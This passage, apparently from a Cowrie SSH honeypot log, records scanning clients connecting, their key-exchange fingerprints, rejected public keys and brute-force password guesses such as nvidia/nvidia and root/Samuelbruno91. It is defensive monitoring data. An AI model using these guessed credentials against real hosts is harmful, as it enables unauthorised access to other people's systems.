6","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:00:03.591835Z","src_ip":"212.227.235.229","session":"36b49fbdd5e5"}
{"eventid":"cowrie.session.closed","duration":"33.1","message":"Connection lost after 33.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:05.529556Z","src_ip":"212.227.235.229","session":"6a6522b41925"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35938,"dst_ip":"1.2.3.4","dst_port":22,"session":"61fdd260f701","protocol":"ssh","message":"New connection: 212.227.125.160:35938 (1.2.3.4:22) [session: 61fdd260f701]","sensor":"my-vps","timestamp":"2025-08-31T07:00:09.128109Z"}
{"eventid":"cowrie.login.failed","username":"www","password":"12345","message":"login attempt [www/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:09.239384Z","src_ip":"212.227.235.229","session":"36b49fbdd5e5"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:11.055674Z","src_ip":"212.227.235.229","session":"36b49fbdd5e5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:00:19.206153Z","src_ip":"212.227.125.160","session":"61fdd260f701"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:00:19.207838Z","src_ip":"212.227.125.160","session":"61fdd260f701"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48938,"dst_ip":"1.2.3.4","dst_port":22,"session":"99b5d7472279","protocol":"ssh","message":"New connection: 212.227.125.160:48938 (1.2.3.4:22) [session: 99b5d7472279]","sensor":"my-vps","timestamp":"2025-08-31T07:00:23.645526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:00:24.617691Z","src_ip":"212.227.125.160","session":"99b5d7472279"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:00:24.618606Z","src_ip":"212.227.125.160","session":"99b5d7472279"}
{"eventid":"cowrie.login.failed","username":"www","password":"12345","message":"login attempt [www/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:26.636095Z","src_ip":"212.227.125.160","session":"99b5d7472279"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:28.265680Z","src_ip":"212.227.125.160","session":"99b5d7472279"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50504,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed4b62583a02","protocol":"ssh","message":"New connection: 212.227.235.229:50504 (1.2.3.4:22) [session: ed4b62583a02]","sensor":"my-vps","timestamp":"2025-08-31T07:00:36.236351Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41864,"dst_ip":"1.2.3.4","dst_port":22,"session":"8181a16415b2","protocol":"ssh","message":"New connection: 212.227.125.160:41864 (1.2.3.4:22) [session: 8181a16415b2]","sensor":"my-vps","timestamp":"2025-08-31T07:00:38.660021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:00:40.464283Z","src_ip":"212.227.125.160","session":"8181a16415b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:00:40.465373Z","src_ip":"212.227.125.160","session":"8181a16415b2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:00:40.743170Z","src_ip":"212.227.235.229","session":"ed4b62583a02"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:00:40.774057Z","src_ip":"212.227.235.229","session":"ed4b62583a02"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:42.106087Z","src_ip":"212.227.125.160","session":"61fdd260f701"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60632,"dst_ip":"1.2.3.4","dst_port":22,"session":"471bf036ee02","protocol":"ssh","message":"New connection: 212.227.235.229:60632 (1.2.3.4:22) [session: 471bf036ee02]","sensor":"my-vps","timestamp":"2025-08-31T07:00:46.638979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:00:46.642894Z","src_ip":"212.227.235.229","session":"471bf036ee02"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:00:46.999147Z","src_ip":"212.227.235.229","session":"471bf036ee02"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":40338,"dst_ip":"1.2.3.4","dst_port":22,"session":"1367b4b1b85a","protocol":"ssh","message":"New connection: 201.148.180.50:40338 (1.2.3.4:22) [session: 1367b4b1b85a]","sensor":"my-vps","timestamp":"2025-08-31T07:00:47.683764Z"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:00:47.715476Z","src_ip":"212.227.235.229","session":"471bf036ee02"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:47.716137Z","src_ip":"212.227.235.229","session":"471bf036ee02"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMtPQsyaqw+aw2IVa/8L11Jo5cY+yQs6PVsZ52P1EsjCUO1W6i4Ck/VnmYZQNf7HphdMkf/5vhwy5XE9gLWlLJBT30KQZzaZvHWfy7Bnpy5EMgeFIqGhYy/4H7r33MPKTzhlmezdn7AlipkrP8Kb/l5NBWLLB1ZNa8TTYI9T1tYRzm+gW1+uVpNuz6WYf+iY7ZcTqlivARqQLBbwK4CoXiWDe395gXJHySnH+Tri5g8LU+M+mnWaRVfieJ0F1+/niQ7e4Vdp4Fo+fxHWTx6+wElYK7GFKytI1cMlOTZTU3DB84de8dLVynaxCv7BzwaFkPL+Ar5sx9LoCHRU0WCi6czVdOg3OaxUrkxP0S/t79AhVaIAsR+I5IvStVI8SIlUQL9RlaKcvqje2z9etRxHYNM8TDUivjcHHGPQOSJROG0VPUMNAHR5EJAZKbMq7DLpXsO8+4nvGQJMuNuMWcU8MMTcLJwfKEQyHaJYXRKq8v8FkJHuL7wi5wxx4E1UFRSGc=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","sensor":"my-vps","timestamp":"2025-08-31T07:00:48.073999Z","src_ip":"212.227.235.229","session":"471bf036ee02"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e9:45:a2:1a:37:f3:2e:c2:35:c7:c7:e4:8a:0f:45:7a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMtPQsyaqw+aw2IVa/8L11Jo5cY+yQs6PVsZ52P1EsjCUO1W6i4Ck/VnmYZQNf7HphdMkf/5vhwy5XE9gLWlLJBT30KQZzaZvHWfy7Bnpy5EMgeFIqGhYy/4H7r33MPKTzhlmezdn7AlipkrP8Kb/l5NBWLLB1ZNa8TTYI9T1tYRzm+gW1+uVpNuz6WYf+iY7ZcTqlivARqQLBbwK4CoXiWDe395gXJHySnH+Tri5g8LU+M+mnWaRVfieJ0F1+/niQ7e4Vdp4Fo+fxHWTx6+wElYK7GFKytI1cMlOTZTU3DB84de8dLVynaxCv7BzwaFkPL+Ar5sx9LoCHRU0WCi6czVdOg3OaxUrkxP0S/t79AhVaIAsR+I5IvStVI8SIlUQL9RlaKcvqje2z9etRxHYNM8TDUivjcHHGPQOSJROG0VPUMNAHR5EJAZKbMq7DLpXsO8+4nvGQJMuNuMWcU8MMTcLJwfKEQyHaJYXRKq8v8FkJHuL7wi5wxx4E1UFRSGc=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:48.076128Z","src_ip":"212.227.235.229","session":"471bf036ee02"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:48.433438Z","src_ip":"212.227.235.229","session":"471bf036ee02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60642,"dst_ip":"1.2.3.4","dst_port":22,"session":"db41b57afd13","protocol":"ssh","message":"New connection: 212.227.235.229:60642 (1.2.3.4:22) [session: db41b57afd13]","sensor":"my-vps","timestamp":"2025-08-31T07:00:48.787776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:00:48.792944Z","src_ip":"212.227.235.229","session":"db41b57afd13"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:00:49.144701Z","src_ip":"212.227.235.229","session":"db41b57afd13"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:49.521223Z","src_ip":"201.148.180.50","session":"1367b4b1b85a"}
{"eventid":"cowrie.login.success","username":"root","password":"Samuelbruno91","message":"login attempt [root/Samuelbruno91] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:00:49.562249Z","src_ip":"212.227.125.160","session":"8181a16415b2"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:00:50.216491Z","src_ip":"212.227.235.229","session":"db41b57afd13"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:50.217100Z","src_ip":"212.227.235.229","session":"db41b57afd13"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","sensor":"my-vps","timestamp":"2025-08-31T07:00:50.573883Z","src_ip":"212.227.235.229","session":"db41b57afd13"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:50.574538Z","src_ip":"212.227.235.229","session":"db41b57afd13"}
